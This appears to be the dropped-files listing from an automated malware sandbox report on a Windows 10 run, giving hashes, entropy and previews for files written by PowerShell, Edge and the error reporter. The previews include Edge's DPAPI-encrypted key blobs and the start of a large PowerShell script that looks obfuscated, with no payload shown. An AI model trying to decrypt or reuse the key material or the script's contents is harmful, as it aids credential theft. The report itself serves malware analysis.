                                                                              SHA-256:9653F0BCE1FBE0B66B9A0093E78967DD6717C477EB8790ABC22E3AB80D42BA8E
                                                                              SHA-512:296CD157D6036F66F2311854F3A5C24E7BD76E35A489D0B6417EF732A64E94AD9C9A99FE073C511592DBB0645ADB4DBCAC2A33F0C3608D8581131F6CEF957937
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>7504</Pi
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.487355206788909
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:75AD00045460CBB1CA2CF84EA01F552A
                                                                              SHA1:567CC367A83FEFA7A9BA0AA5188EB0CDBD90D481
                                                                              SHA-256:4CA824DBC43F96A1039DF79FD387A4D33844AB1DEC72AFB1966C112330323C16
                                                                              SHA-512:DFAD4D04034E92EED2CA82C38C39E7F99E87A94EFA7B55772E9904C92ACB3CB3D2CA071D9E2056606AC5380EF032109046850FC2132839DBA4286201E9518BC7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.493342389665137
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:02F922F95E703DB473DAF1B34CB8E1EC
                                                                              SHA1:98FC62D92B75D01BB61E7926A01CA1B9C6896AC7
                                                                              SHA-256:40A8042EC3E83DE26F7B71D79D1E65461EB23094C7B6F32EEAF99AA93C6FAD77
                                                                              SHA-512:0D7649AAE3CA0BEFD5D23E341EE525975C6609C075BE1E0F1810A14369A3A7F24CB031E6274D780FD750E976471E279218E21048550502446CA8CDA9CCD79A17
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.495789661916105
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:59B488EBF0EC3A3FC667A1DA5EDDC011
                                                                              SHA1:4E6BBFE32AB927B2DC564238CCE437BD5153E2D8
                                                                              SHA-256:132BE4A6DB111EF24DA97351454F599BBCB7BBCA4DD55A44A9D3A8233AD50377
                                                                              SHA-512:2286E41B23739A944BFBD4E51010E51CDD22ADB2672F9907F8F64F6D77BD170E214C5F19F6E5D337BED019493C11B27A7D6F2858D3841ACF9594A52736E004B7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65535)
                                                                              Category:dropped
                                                                              Size (bytes):7535383
                                                                              Entropy (8bit):2.296097591164397
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:8B2160164FA0AC208376E0C857F6695D
                                                                              SHA1:C66547080187BD0270BA6A69B50C2D42150872D3
                                                                              SHA-256:782E48635E2805D9D130E24FC2F2B0A70EEF63552F1D3B4D9EDF003AF55FDB22
                                                                              SHA-512:A5A445314D076761C72AEF94B65A23629845D644E7A3F7C204F4121F0773A5D3FF8FBBBF5D741DE83D7BAFD5AD44C2C501A21E892800DC7AFB93550134B04FC5
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:.$poppopmdabaomazyurao = "
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2278
                                                                              Entropy (8bit):3.8617906529204857
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:1AB984A68690DF8ABA447D14DC520FC8
                                                                              SHA1:3E4CF2B703F11CD1773A745C43DA17B38912591C
                                                                              SHA-256:E9E42B69A581B002DE0C2CC3CF6880D9916EF2A9E141DBED1A54C4462EE44A0D
                                                                              SHA-512:6E3A15C7FFDFDF352D21636917E14A6867A8E7DCA8280B6A1CAB5646FC07BF3938F8D07594649D40B311358669B7CB568C3BAEA7A17842C0D86B243920DBA7EE
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"gEqR6g+V2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAacyAcf
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4622
                                                                              Entropy (8bit):3.9921784967091902
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4C725B1DC7223DEBC506B09B2F32A3AD
                                                                              SHA1:D3C52DC1EC4DA706C9170F59337744EF968AAFAE
                                                                              SHA-256:7187635E903AD2E5C9B459A9A6110094CE423D052EE53AC390828505A21292D4
                                                                              SHA-512:A8BFFCF9F54BAF4CF827B8F4C1F9EA43BCB6D0A1B21072B9A5A759242D1E16FF4926592BC790CA86BB36A1F2DC3DD980294C4A9F46DB2A4A2FDC506C51611133
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"z3UTqTb37/uzhiflb40fzhDrEsw="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"sAzt0AeV2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AwAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAacyAcf
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2684
                                                                              Entropy (8bit):3.8987076802596636
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:B45E2F5D13CFF9D64531F1D3BEAB08E0
                                                                              SHA1:6BFD3F9461E90AF86A26637BB474CCF2E94EE6A8
                                                                              SHA-256:0BA1529EC2532CB70458BB7BD995F8A649339FD4A23CD5DBEAC6D4644E538CF6
                                                                              SHA-512:25F71062E0A100D7EF072E1C0F8C7E1B2388F71EDE29E9380C9996CBC398BAEE53AE61EE13D02A975DCBC9ECF48BF17D0F52B76034427A3FD9B3EEA8D0CBB96B
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"6N3Uy9nAUEqs5u96E/og0E/VJAg="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"XukTAtmz3AE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAacyAcf
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):47721
                                                                              Entropy (8bit):5.074691086935296
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:A6F227D3953690EE67C4850E94B7A89A
                                                                              SHA1:D24F88B64A4DF2803E3FBE0727B0B248158294F9
                                                                              SHA-256:A7BB4D3F8E67FA7220A892C02F3C2F87413C325E600EE1D7550ECE1097F2AFDA
                                                                              SHA-512:8C75308E04B306D454D86A84D8D5179085F3D614E449DA5DDAE958948E605900F023C336ECA01B42B1590C873E16B0FFCB41C30585833F840B66F104170EFFED
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1371
                                                                              Entropy (8bit):5.528888726744438
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):3297
                                                                              Entropy (8bit):5.591835093547375
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:6D32F695326F69E88B21173D92B38A87
                                                                              SHA1:6ED17C1F3EECF701C6DEFDD52678E5B3EF644301
                                                                              SHA-256:AAE2FC197A8955DDE8912110746561D62154F989E42EBCAE4319CB53C2B031FE
                                                                              SHA-512:C3D6611643593C487A9DEACD93B634A014C5DD9B42912095778E4C6EDDFD4EDD6AD6A5814AE9637F084EA26B9002AB05D8D43D61B9B36F99CD01FE17D717A5D1
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"policy":{"last_statist
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):280
                                                                              Entropy (8bit):1.781457559330693
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:81DF9F31964B92F3FA798A55AD1BF1C5
                                                                              SHA1:786E39242C529EB89693CDF8E8368FA9F28D85D7
                                                                              SHA-256:6C219AFF67E9A2EC2E2ED907F9BEF2E6E3BCCC6DE40AC01C4C1F4401CE731E38
                                                                              SHA-512:F3B74DB0DAAD944A1E2147A012FE1F4E2903A368887E6F3D5154B400615D79E20391329AB6FF5910A9F745BD8D6597E063B13EBC6E055EA98D3ED89306C11D66
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:sdPC.....................|^P=a.@..D.1...................................................................................................................................................................................................381e0670-e4c7-4d0c-b389-59df81a2cdc6............
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):20
                                                                              Entropy (8bit):3.6219280948873624
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:level=none expiry=0.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):48
                                                                              Entropy (8bit):2.9972243200613975
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AC2FE7D332BA6CDA7803E5A32F6E8766
                                                                              SHA1:06B043446B9DA340DC0AF9BCC3A632DAC1326459
                                                                              SHA-256:D4C79E12C1154180946A41A82DA1FF50704FFE39CC01ACB472CAA223B49452F1
                                                                              SHA-512:4E01FE4D004A6A496BC4EB521CBCC2363F39FD8A1DB68B1B305A258477B9387F13B8AABAA496F5D0976117D1660B07575B90490F6DB9C5E875752BA9B2A03CAD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(...$...oy retne...........................'./.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AC2FE7D332BA6CDA7803E5A32F6E8766
                                                                              SHA1:06B043446B9DA340DC0AF9BCC3A632DAC1326459
                                                                              SHA-256:D4C79E12C1154180946A41A82DA1FF50704FFE39CC01ACB472CAA223B49452F1
                                                                              SHA-512:4E01FE4D004A6A496BC4EB521CBCC2363F39FD8A1DB68B1B305A258477B9387F13B8AABAA496F5D0976117D1660B07575B90490F6DB9C5E875752BA9B2A03CAD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(...$...oy retne...........................'./.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):48
                                                                              Entropy (8bit):2.9555576533947305
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:90CFE7AAD34FDA6F8D0255F78578C194
                                                                              SHA1:00AD8F6A56D361B55812DBB6E6EEFA7EB17A0FF5
                                                                              SHA-256:516F6BB3DC6E5AF57ECB848B6DC903494CDB85961494C11C67DA04946ED4D69E
                                                                              SHA-512:5C2CE4108F2226B13923BA63FFFC7A4060B78F7BC85A1D2FE20105D1D0F50AA51FF2E9198CA605D41DF9E4A7311B4BEF8A3CE878A059F4CA88447BB9661D480F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(....y..oy retne...........................'./.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:90CFE7AAD34FDA6F8D0255F78578C194
                                                                              SHA1:00AD8F6A56D361B55812DBB6E6EEFA7EB17A0FF5
                                                                              SHA-256:516F6BB3DC6E5AF57ECB848B6DC903494CDB85961494C11C67DA04946ED4D69E
                                                                              SHA-512:5C2CE4108F2226B13923BA63FFFC7A4060B78F7BC85A1D2FE20105D1D0F50AA51FF2E9198CA605D41DF9E4A7311B4BEF8A3CE878A059F4CA88447BB9661D480F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(....y..oy retne...........................'./.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:11797D86B46B9E3ADA93F5D3D1C0554F
                                                                              SHA1:5CD636A0A53F43E6EE76F9DD872F1E1A9C536721
                                                                              SHA-256:BA1CE2255B70B4A2F68505A0F71FD0C16A387F5A4FB1CE7031F9B55364BA7438
                                                                              SHA-512:3F6293C00A2D1AAC605C3FA9E9BD7DB7F1EF8151C4D1E9864D92C5F77692F5CD36FA2C124C848AD6725711DE0FA618ECE41902502A6969829870B7416E88840B
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................<*J'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.47693366977411E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9E0B939A7AA85E95D13539822641BC9B
                                                                              SHA1:B79BAE54866B7FE507537001CEA9A3FC96668E7A
                                                                              SHA-256:E70EAC4A55443E263940A63C38F3B18ED2161F17BBD47DD3DA8866AFF70DB932
                                                                              SHA-512:3842489EBA55324C029D0569C2529928A4BFBC293A6229BE8BA3C49FDFE8844B4EA69F79BF74BF1EA4D02130FCAC13CD9708A2611BDA1DC7A1BA01EFAFD712DD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................./H'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182
                                                                              Entropy (8bit):4.2629097520179995
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):11417
                                                                              Entropy (8bit):5.237554345326078
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:41A658DAE933D62491EADE9BE176560E
                                                                              SHA1:1D872039A0A133825E2FDFB2DA594BE267825FF0
                                                                              SHA-256:345A9FDB80D2EBDEFFB01E47637C8D6D985437D38BAE209AB5C8D890C2D4FE84
                                                                              SHA-512:2814C44E470CD93F016108745266B69B8F20347E76DD927A6D0D2F733500FAC758A391F30C131DD5E10D9C0218C98E493FB79E3AB63A5DC132AB0A706507F8BD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..........................................a'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:97DE55AB17F4D7AABC709F5BCE31EC54
                                                                              SHA1:799BC9822B6101C077E445C52F464420DAC9D859
                                                                              SHA-256:1BB2D76D3574820F3FB8DBFED8E72F24139F7E16F3F4392C5C3D8EB6E32430C1
                                                                              SHA-512:8BC6990B9881D12AF08B3DC3A047B6E1F7E2336C7C49FE8D4A35102CA1FD49A759C243D43165561993378E98309A40F1E1B08682C644054251250E2A992129B0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................."d'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):13
                                                                              Entropy (8bit):2.7192945256669794
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
